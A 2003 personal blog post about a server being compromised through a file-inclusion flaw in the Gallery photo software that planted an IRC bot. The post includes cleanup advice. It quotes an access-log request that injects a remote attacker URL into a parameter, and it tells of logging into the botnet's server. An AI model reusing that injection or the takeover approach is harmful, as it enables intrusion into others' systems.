 |
2,592,866 MP3 Downloads and Counting!
fight hax0rz with hax0rz
Posted on Thu, May 22 2003 I noticed some odd script kiddie-style hits on my website earlier today to my Gallery page, but from what I saw they all 404ed. Later on, I noticed an odd program running on my server called 'vb.pl'. It turns out I missed one of those suspicious hits, and they had been able to run a program on my machine.
I poked around to see if I could find the program they were running on my drives, but to no avail. I looked into that hit that didn't 404: 202.148.160.6 - - [22/May/2003:10:57:17 -0500] "GET /errors/configmode.php?GALLERY_BASEDIR=http://hacked.mail333.com/g12/vb/ HTTP/1.0" 200 19 Well, there's the "vb" part. After poking around a bit, it turns out to be a vulnerability in Gallery. Lovely. I looked at the script that got hacked, and found that it caused this to be executed. Hmm.. not suprising, it's a zombie IRC bot that logs onto a private server and offers shell access to your machine to its masters. The script gets killed on my box, but my curiousity took over.
I used the hardcoded info at the top of that script to log on to the IRC site. It turns out that there were hundreds of servers who had been hacked. I saw the folks who were controlling them logged on, but idle for a few hours. Hmm. I could have just left well enough alone, but I hadn't yet done my good deed of the day, and it was getting late.
I did some reverse engineering of the script to learn how the bots were being controlled. You first need to send it a
Script kiddies are cute. Update: I'm getting questions about what to do if you're hacked with this. First of all, kill off the "vb.pl" immediately. Next, remove all instances of the Gallery files /errors/configmode.php, publish_xp.php and publish_xp_docs.php. Finally, figure out of they hacked the rest of your machine. :)
| 
New CD, "Breadcrumbs"
Download free!
|
